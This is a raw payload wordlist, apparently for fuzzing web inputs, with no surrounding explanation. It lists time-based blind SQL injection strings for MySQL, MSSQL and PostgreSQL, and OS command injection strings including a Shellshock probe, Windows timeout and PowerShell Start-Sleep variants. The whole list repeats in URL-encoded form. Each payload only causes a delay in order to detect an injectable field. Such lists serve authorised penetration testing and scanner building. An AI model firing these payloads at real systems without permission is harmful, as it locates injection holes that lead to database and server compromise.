sleep(4)#
1 or sleep(4)#
" or sleep(4)#
' or sleep(4)#
" or sleep(4)="
' or sleep(4)='
1) or sleep(4)#
") or sleep(4)="
') or sleep(4)='
1)) or sleep(4)#
")) or sleep(4)="
')) or sleep(4)='
;waitfor delay '0:0:4'--
);waitfor delay '0:0:4'--
';waitfor delay '0:0:4'--
";waitfor delay '0:0:4'--
');waitfor delay '0:0:4'--
");waitfor delay '0:0:4'--
));waitfor delay '0:0:4'--
'));waitfor delay '0:0:4'--
"));waitfor delay '0:0:4'--
;sleep 4;
|sleep 4#
|/usr/bin/sleep 4#
|sleep 4;
& sleep 4;
;sleep 4|
`sleep 4`
`/usr/bin/sleep 4`
`sleep 4`
() { :;}; /bin/bash -c "sleep 4"
|C:\Windows\System32\timeout.exe 4
|timeout 4|
|C:\Windows\System32\timeout.exe 4|
|timeout 4;
;system('timeout 4')
;system('C:\Windows\System32\timeout.exe 4')
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
;Start-Sleep -s 4;
;Start-Sleep -s 4#
|Start-Sleep -s 4|
|Start-Sleep -s 4;
;Start-Sleep -s 4|
;system('Start-Sleep -s 4')
%0AStart-Sleep -s 4%0A
%0a Start-Sleep -s 4 %0a
sleep(4)#
1 or sleep(4)#
" or sleep(4)#
' or sleep(4)#
" or sleep(4)="
' or sleep(4)='
1) or sleep(4)#
") or sleep(4)="
') or sleep(4)='
1)) or sleep(4)#
")) or sleep(4)="
')) or sleep(4)='
;waitfor delay '0:0:4'--
);waitfor delay '0:0:4'--
';waitfor delay '0:0:4'--
";waitfor delay '0:0:4'--
');waitfor delay '0:0:4'--
");waitfor delay '0:0:4'--
));waitfor delay '0:0:4'--
'));waitfor delay '0:0:4'--
"));waitfor delay '0:0:4'--
pg_sleep(4)--
1 or pg_sleep(4)--
" or pg_sleep(4)--
' or pg_sleep(4)--
1) or pg_sleep(4)--
") or pg_sleep(4)--
') or pg_sleep(4)--
1)) or pg_sleep(4)--
")) or pg_sleep(4)--
')) or pg_sleep(4)--
AND (SELECT * FROM (SELECT(SLEEP(4)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(4)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)#
SLEEP(4)#
SLEEP(4)--
SLEEP(4)="
SLEEP(4)='
SLEEP(4)/*' or SLEEP(4) or '" or SLEEP(4) or "*/
sleep(4)%23
1%20or%20sleep(4)%23
%22%20or%20sleep(4)%23
'%20or%20sleep(4)%23
%22%20or%20sleep(4)%3D%22
'%20or%20sleep(4)%3D'
1)%20or%20sleep(4)%23
%22)%20or%20sleep(4)%3D%22
')%20or%20sleep(4)%3D'
1))%20or%20sleep(4)%23
%22))%20or%20sleep(4)%3D%22
'))%20or%20sleep(4)%3D'
%3Bwaitfor%20delay%20'0%3A0%3A4'--
)%3Bwaitfor%20delay%20'0%3A0%3A4'--
'%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22%3Bwaitfor%20delay%20'0%3A0%3A4'--
')%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A4'--
))%3Bwaitfor%20delay%20'0%3A0%3A4'--
'))%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A4'--
%3Bsleep%204%3B
%7Csleep%204%23
%7C%2Fusr%2Fbin%2Fsleep%204%23
%7Csleep%204%3B
%26%20sleep%204%3B
%3Bsleep%204%7C
%60sleep%204%60
%60%2Fusr%2Fbin%2Fsleep%204%60
%60sleep%204%60
()%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fbash%20-c%20%22sleep%204%22
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204
%7Ctimeout%204%7C
%7CC%3A%5CWindows%5CSystem32%5Ctimeout.exe%204%7C
%7Ctimeout%204%3B
%3Bsystem('timeout%204')
%3Bsystem('C%3A%5CWindows%5CSystem32%5Ctimeout.exe%204')
%26%26%20FOR%20%2FF%20%22delims%3D%22%20%25i%20IN%20('timeout%204')%20DO%20echo%201
%3BStart-Sleep%20-s%204%3B
%3BStart-Sleep%20-s%204%23
%7CStart-Sleep%20-s%204%7C
%7CStart-Sleep%20-s%204%3B
%3BStart-Sleep%20-s%204%7C
%3Bsystem('Start-Sleep%20-s%204')
%250AStart-Sleep%20-s%204%250A
%250a%20Start-Sleep%20-s%204%20%250a
sleep(4)%23
1%20or%20sleep(4)%23
%22%20or%20sleep(4)%23
'%20or%20sleep(4)%23
%22%20or%20sleep(4)%3D%22
'%20or%20sleep(4)%3D'
1)%20or%20sleep(4)%23
%22)%20or%20sleep(4)%3D%22
')%20or%20sleep(4)%3D'
1))%20or%20sleep(4)%23
%22))%20or%20sleep(4)%3D%22
'))%20or%20sleep(4)%3D'
%3Bwaitfor%20delay%20'0%3A0%3A4'--
)%3Bwaitfor%20delay%20'0%3A0%3A4'--
'%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22%3Bwaitfor%20delay%20'0%3A0%3A4'--
')%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A4'--
))%3Bwaitfor%20delay%20'0%3A0%3A4'--
'))%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A4'--
pg_sleep(4)--
1%20or%20pg_sleep(4)--
%22%20or%20pg_sleep(4)--
'%20or%20pg_sleep(4)--
1)%20or%20pg_sleep(4)--
%22)%20or%20pg_sleep(4)--
')%20or%20pg_sleep(4)--
1))%20or%20pg_sleep(4)--
%22))%20or%20pg_sleep(4)--
'))%20or%20pg_sleep(4)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))bAKL)%20AND%20'vRxe'%3D'vRxe
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))YjoC)%20AND%20'%25'%3D'
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)%23
SLEEP(4)%23
SLEEP(4)--
SLEEP(4)%3D%22
SLEEP(4)%3D'
SLEEP(4)%2F*'%20or%20SLEEP(4)%20or%20'%22%20or%20SLEEP(4)%20or%20%22*%2F